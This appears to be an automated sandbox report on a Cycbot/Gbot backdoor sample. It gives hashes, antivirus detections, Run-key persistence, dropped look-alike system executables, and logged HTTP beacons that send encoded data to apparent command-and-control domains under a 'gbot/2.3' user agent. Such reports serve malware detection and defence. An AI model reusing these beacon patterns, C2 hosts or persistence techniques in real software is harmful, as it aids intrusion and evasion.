Analysis Date: 2015-01-17 13:24:35
MD5: 8c4470ae149269d2409f6a2126cd4dda
SHA1: 1d5eaaf51ead368c7a7c67aef8b45ad50abd4cd1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d36ff634e54112afad9c46acbef6b408 sha1: 9084fe0bd907d9dbb18577c3b30b7ba24820c84a size: 101888
Section: .rdata md5: 63d68bfaaf4ee8c774f933f84e49d246 sha1: 97d02411a1241856d77ef167237c308ec0c0138c size: 1024
Section: .data md5: 2bb55a8b0676ca647a0f2062e6b755b1 sha1: 6b2340940e061fe81ed49de3773ce7c7dfa7e7a5 size: 20480
Section: .rsrc md5: e540b75a180ac4af10e15a6c7097b00a sha1: 946d3ce6cfa9e4f533b72d5134560f7cdb01380c size: 1024
Timestamp: 2005-10-19 12:19:47
Version: PrivateBuild: 1123
PEhash: c8a4da16bff8a22c284f459a26690761bfb64871
IMPhash: d7b3697981a4bb7b090c3ebd4660478b
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Trojan.Heur.KS.1
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV: Authentium: W32/Goolbot.C.gen!Eldorado
AV: Avira (antivir): TR/Crypt.XPACK.Gen
AV: BullGuard: Gen:Trojan.Heur.KS.1
AV: CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Diple-19
AV: Dr. Web: Trojan.DownLoader1.42564
AV: Emsisoft: Gen:Trojan.Heur.KS.1
AV: Eset (nod32): Win32/Kryptik.IVA
AV: Fortinet: W32/FakeAV.PACK!tr
AV: Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV: F-Secure: Trojan-Downloader:W32/Renos.GTC
AV: Grisoft (avg): Agent.5.BJ
AV: Ikarus: Backdoor.Win32.Gbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Backdoor.Win32.Gbot.bs
AV: MalwareBytes: Spyware.Passwords.XGen
AV: Mcafee: BackDoor-EXI.gen.e
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV: Rising: no_virus
AV: Sophos: Troj/FakeAV-CDG
AV: Symantec: Backdoor.Cycbot!gen2
AV: Trend Micro: BKDR_CYCBOT.SME
AV: VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: www.google.com
Winsock DNS: zoneck.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonejm.com
Winsock DNS: www.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: www.internetsecure.com, Type: A, 198.203.191.132
DNS: zoneck.com, Type: A, 208.79.234.132
DNS: www.google.com, Type: A, 173.194.37.82
DNS: www.google.com, Type: A, 173.194.37.81
DNS: www.google.com, Type: A, 173.194.37.80
DNS: www.google.com, Type: A, 173.194.37.84
DNS: www.google.com, Type: A, 173.194.37.83
DNS: motherboardstest.com, Type: A, 204.11.56.45
DNS: zonejm.com, Type: A, 23.239.15.54
DNS: xibudific.cn, Type: A
DNS: dolbyaudiodevice.com, Type: A
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz%2Bvw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51IortCC5IaGUUmp1NLyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://www.internetsecure.com/images/ismerch.gif?tq=gJ4WK%2FSUh5zAhRMw9YLJkMSTUivqg4acwZFEfqHXarVJ%2BQhhaGE%3D
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz%2Bvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz%2Bvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbFRK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1033 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1034 ➝ 198.203.191.132:80
Flows TCP: 192.168.1.1:1035 ➝ 173.194.37.82:80
Flows TCP: 192.168.1.1:1036 ➝ 173.194.37.82:80
Flows TCP: 192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1038 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1039 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1040 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1041 ➝ 204.11.56.45:80

Raw Pcap

Strings
040904b0
1123
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
@.data
DeleteCriticalSection
EnterCriticalSection
EnumResourceNamesA
ExitProcess
FindClose
FindFirstFileW
FreeEnvironmentStringsA
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
InitializeCriticalSection
KERNEL32.dll
LeaveCriticalSection
LoadLibraryA
LresultFromObject
OLEACC.dll
`.rdata
ReadFile
ReleaseSemaphore
SetEndOfFile
SetEvent
SetFilePointer
!This program cannot be run in DOS mode.
WaitForMultipleObjects
WaitForSingleObject
WriteFile